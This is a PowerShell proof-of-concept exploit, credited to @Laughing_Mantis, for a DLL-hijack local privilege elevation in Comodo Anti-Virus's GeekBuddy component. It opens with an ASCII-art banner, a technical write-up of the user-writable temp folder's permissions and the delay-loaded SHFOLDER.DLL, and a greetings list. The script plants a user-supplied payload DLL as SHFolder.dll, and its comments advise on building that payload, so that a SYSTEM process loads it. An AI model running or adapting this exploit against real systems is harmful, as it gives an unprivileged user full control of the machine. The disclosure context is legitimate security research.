<#
````......````
``,;''''''''''''''''';,`
.;''''''''''''''''''''''''''',`
`:''''''''+';:,.``````.,:;'''''''''':`
,;'''''';,.` ``,;'''''';:
`:'''''',. `,'''''';.
`;+''+':` ,; `,''''';.
`;'''';. `` .:;'` `. `;'''''.
` :+''';` `,``:+'' ';;'`,''; `` `` :'''';`
.'''';` ,';' '':'` ';,'`'',' :''' .''` :'''',
`;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''`
.''''. ;:`, .'.':`'''.:;`;. +;:' '::; ;''' '; .'''',
:''';` ` '''',`':'' ..;:`','` '''' ':;;`'`';`':` :; :''';
;''+, .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';': .+'''`
`''''` ;'; ''.'.,','` ,` ``;`'' .`;'`''+: ;'''`
`'''' ., .'' ,'.'' ;;. ```````` `. ``'::'`;; ` :'''.
``''': `+,` .':`'',' `,;''''''''''+'':.` ;'.+:;'``': .'''.
`''', '', ''`:; `:'''''''''''''''''''''';. `;'`': ''`'` .''',
`''', ` `''` `'; .''''''''''''''''''''''''''''';` `.;' ;'.''`.: `''',
`''', :''.`'' ` ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''` .'''.
''', '.''`,': ,'''''''''''''''''''''''''''''''''''''', ` .+,'; ''; .'''`
''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''. ;' :': ,,` .'''
:''; `''.'` ` :''''''''''''';:::.', `''';`:;'+'''','''''+; `,'; :''' ,'''
.''' `` .++; `''''''''''''`. `': '''; `:''' :'''''''. .+ :''.+. :'':
`''+ :'': `` ,''''''''''''' `': '''; `: ,'''''''': .`''.'' ` '''`
;''. `+.',; ;'''':''''''''; ` ', .'''': ` :''''';'''; `'.',`,', `+''
,'': '';,'. ;''''':''''''''`+` ;..`;'+''. '.:''''';'''''```.+' +:'` .'';
`''' `;``+',;.` ;''''':''''''''.'; `;'', '` '' ;''''','''''` ;,+.+. ;''.
;'+. :'': ;': ;'''''':''''':',''. `'';.+' '` ,'; .'''';''''''` `+.':` `'''
`'': .+`;''` ` ;'''''':''''''.::''. .''. :: `'';`,'''':''''''` :+'. ,'',
'''` :''.:'' :''''''':'''''; :'''' .'', `.,; :+'`''': ;''',''''''' ,` '''
.'': `'';`` ,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+` .'':
''' `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''', ` ;'': '''
.'', ','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''` :'';` `+':
'''` ''.,'; ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;''
`'': .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', ., `` .'',
` :'' :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''` .++. '';
+'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.''''''; .+'''` :'+`
,''. ': +'''''; ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.', ;''''''` :'': `. `'';
;'' :;.;': ,''''''. `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.; .;'+` ;''
'': ` ;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;. ,'''''' `;''''. .''`
.''. .';`;' .''''''. :+;;''''''''''': ;' ::::...;''+'':,'''';..``;''';. ''''''; `:''.`': `'':
:'' ` ,'` ;''''''. :;'''''''''''''';`;, `,''';` .:;;;'''': ,'''''' .,''', '''
;'; ''';,` `''''''''''` :''''''''''';.:'''`';:` ,''';`;''''''''''', ''''''. ;';,` :''`
`'', .;,'''; ,'''''''''' ;'''''''''':` :'''`::` ``'''',+''''''''''''+` ;'''''; .``.:;` `''.
.''` `+;'`;` '''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''` ;'';;; `+':
:'' ..;'' `''''''''''`'''''''', .'''` `+''';''. ,'''''''''''''''''''''''''''''''''''''':`
;'' :. `` .'''''''''';'''''''' ;''; ;''':::` :'''''''''''''''''''''''''''''''''''''''',
;': '''':` :'''''''''''''''''',` .''' ''''. `+'''''''''''''''''''''''''''''''''''''''''
'', :,;'': ;''''''''''''''''''` ;''... :''''` :''''''''''''''''''''''''''''''''''''''''''`
`''. `+'':,` ''''''''''''''''''; ,'';.+` . ,;''' `'''''''''''''''''''''''''''''''''''''''''';
.''. `.,;'; '''''''''';''''''', ''',+. `` .' .''' ''''''''+'''''''''''''''''''''''''''''''''',
.'+` ;''''' `` '''''''` `;''''.'++','`+.''' ''''''; `;+''''''
,'' ''''';; ,'''';'''';'``.''' :''''''` .'''''':
:'+ '''''': .'''';'''';'` .''' ,''''''` ,''''';
:'' ,''''', ''''''` .'''';'''';', .'''` .''''''` ''''''
;'' `''''''; :''''', '''''' .'''';'''';':,''''. .''''''` ''''''
;'' `';''''' :''''', :''''; :''''''''';''.''''' `''''''` ;'''''
;'' :''''', ,''''' `+''''''''':''.'''''` ,'''''; ''''''
:'+ ,''''', `'''''. ,'''''''''':''::''''; ;''''': `''''''
:'' ```. ,''''': ''''': `''''''''''',''+`'''''. `''''''. :''''''
,''` `''''''' .'''''; `''''': '''''''''''';''',,''''', ''''''' ,'''''',
.''` `''':,.; `'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .''''''''
`''` `,;;;''` '''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''',
'', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+ '''''''''''''''''''''''''''''';
'': ` `,. ;'''''. `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';';
;'; ,''''; :''''': `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,'''''''''''''''''''''''''''';
;'' ';;,.. .'''''' `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';.
:'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+: '''''''';''''''''';''''';,`
.''. .''',` ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''` `'''''' `,'': `+':
'': ` .;. ,'''''+ .'';,'''''''';:''''''''','''''''': ;'''''''''.`,''''''' ;'''''; ,'', .''.
''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''', ''''''. ':''', :''`
:'' ,';:.'. ;'''''' ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'': :'''''' ';,.:' '''
.''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'':
''; ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;: ,''`
;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.''''''; ,'+'. '''
.''. '''';` ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:''' `'':
''' :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..' :''
:''` `,. ;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''` '';
`'': `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,' ,'',
;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+; '''
`'': ;'';` ` ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:'; .'':
''+` ,` ,+: `'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;, '''
.'': ;';''. .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''': +'``;'; .'',
''+` :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';''''''; ,.''. .`` '''
`';; `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''.
:'',` `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''` `'''
''' ;'.:''` ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',: '''`
.';; `;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';'''''; .,''` :` ,'':
;'', `', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,''''; ``.'''; ``'''
'''` `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''` '''`
.''' ;'.'' `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'',
,''; ''.;', ,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';
;''; ''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''
''': .,,': :': +''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',`
''': ` .'' `'`;'''''''..,.:+,` ``.,.` ,'''`;'''''''+.';'.:'''':;'''''+:.'`
''': ;:`+'` ,:..,''''''; .+: `:'+''''';` ;'; .''''': `:';:+''';`''''''. .':
`'''; ; ;'. .';'`;'''',;'. .+''''''''''` ;;'+:'''; .+'''''''';''''''.;,'';
`'''' ,'; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.''';
`'''' ` ` `':. ';''.+. `''''''''''''; `'''''::'''.'''',`'''''': :';;''
''''. :;,'`:'.';', '''''''''''': ,'''','''..''': '''';;:,''. `''
:''': `.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' ';
,''''` `,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`':
`'''': ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','.
:''''. .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'.
`'''''` `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''',''
,'''''` `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:
:''''', .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.
`:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+
`,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:
.;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +
.:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``:
'. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`'
;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`;
.+ ''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;`
+: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;..,
,' ``.. `+''''''''''+` :' `'';`''':. ,.',''.; '
`+' :'''''''''''', `+.` '',.''',. :,''''+ ;
.', ;''''''''''''. ': ''.,''':` ;.''''.,.
:'. :''''''''''', ;'` ''.:''',':;.''':.:
''. ,:''''',` ;+` :'.:'''' ':`''; ;
`'', ''. ::,''''``; :, '
;+;` .'+` ``'':'`,; '``
,'';. `.'';` :';'.,; '.
`,''';:::::;'''. ``+;' +`
`,:''''';,` ,,;
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
###Technical Geeky Stuff###
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
The directory listing is as follows:
10/06/2015 12:08 AM <DIR> .
10/06/2015 12:08 AM <DIR> ..
10/02/2015 10:43 PM 27 download.cfg
10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015 10:43 PM 1 survey_version.txt
10/06/2015 12:05 AM <DIR> updates
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Notice that the folder grants BUILTIN\Users FILE_WRITE_DATA (create files), FILE_APPEND_DATA, FILE_WRITE_EA and
FILE_WRITE_ATTRIBUTES on top of the inherited read-only entry. A non-administrator can therefore create new files
in the directory but cannot delete or modify files created by other accounts; files the user creates are theirs
to overwrite (CREATOR OWNER has Full control).
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
level privileges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
During client connections to update servers and Geek Buddy executions, unit.exe launches
setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary delay-loads SHFOLDER.DLL by
module name only (no absolute path), so the loader resolves it starting from the directory the executable
is run from, i.e. C:\ProgramData\Comodo\lps4\temp.
.data:00409240 dd offset aShfolder ; "SHFOLDER"
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
During this delay-load the executable resolves SHFOLDER.DLL from its own directory before falling back to the
system directories and the directories listed in the PATH environment variable, so a copy planted alongside it wins.
By planting a malicious SHFOLDER.DLL in C:\ProgramData\Comodo\lps4\temp\ (which requires only a standard user
account, per the ACL above) and triggering an update or a client connection to the vendor's servers (which also
occurs automatically at user login), a local user gets their DLL loaded into a SYSTEM-level process and can
fully compromise the machine.
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
Sizzop - for fixing my greetz
#########################################################################################################
#>
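# Script body: runs as the (unprivileged) local user. It only needs to be able
# to create a new file in $TargetDir, which the ACL on that folder grants to
# BUILTIN\Users (FILE_WRITE_DATA); loading the DLL into a SYSTEM process is
# done later by Comodo's own components, not by this script.
Param
(
    # Path to the payload DLL that will be copied into place as SHFolder.dll.
    [Parameter(ValueFromPipelineByPropertyName = $true)]
    [string]$DLL = "",

    # Folder the hijacked setup binary is run from. Defaults to the path from
    # the advisory; override if the GeekBuddy data folder differs on the target.
    [string]$TargetDir = "C:\ProgramData\Comodo\lps4\temp"
)

# Fail early with a readable message: Test-Path throws a parameter-binding
# error on an empty string, which hides the real problem (no -DLL given).
if ([string]::IsNullOrWhiteSpace($DLL))
{
    throw "Fatal Error: No DLL specified. Use -DLL <path to payload DLL>."
}
# -PathType Leaf: a directory passed by mistake must not be "copied";
# -LiteralPath: do not treat [ ] or * in the path as wildcards.
if (!(Test-Path -LiteralPath $DLL -PathType Leaf))
{
    throw "Fatal Error: The specified file: $DLL does not exist."
}

$Destination = Join-Path $TargetDir "SHFolder.dll"

# Announce before acting so the message matches what is actually happening.
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red

# -ErrorAction Stop: Copy-Item raises a non-terminating error by default, which
# would let the script go on to announce success after a failed copy (e.g. an
# existing SHFolder.dll created by another account cannot be overwritten by a
# member of Users -- only the file's creator can).
Copy-Item -LiteralPath $DLL -Destination $Destination -Force -ErrorAction Stop

if (!(Test-Path -LiteralPath $Destination -PathType Leaf))
{
    throw "Fatal Error: $Destination was not created."
}

# NOTE(review): the target reaches the DLL through a delay-load import of
# SHGetFolderPathA (see the .data references quoted in the header). DllMain
# runs at load time either way; whether a missing export then aborts the host
# was not verified here -- exporting SHGetFolderPathA (forwarded to the real
# shfolder.dll) is the safe choice for a payload. The payload's bitness must
# match the setup binary; the 0x0040xxxx .data offsets in the header suggest a
# 32-bit image -- confirm against the actual binary.

# Tray notification (purely cosmetic). Add-Type replaces the deprecated
# LoadWithPartialName; System.Drawing is loaded explicitly because
# [System.Drawing.Icon] is referenced directly below.
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
$MyPath = (Get-Process -Id $pid).Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)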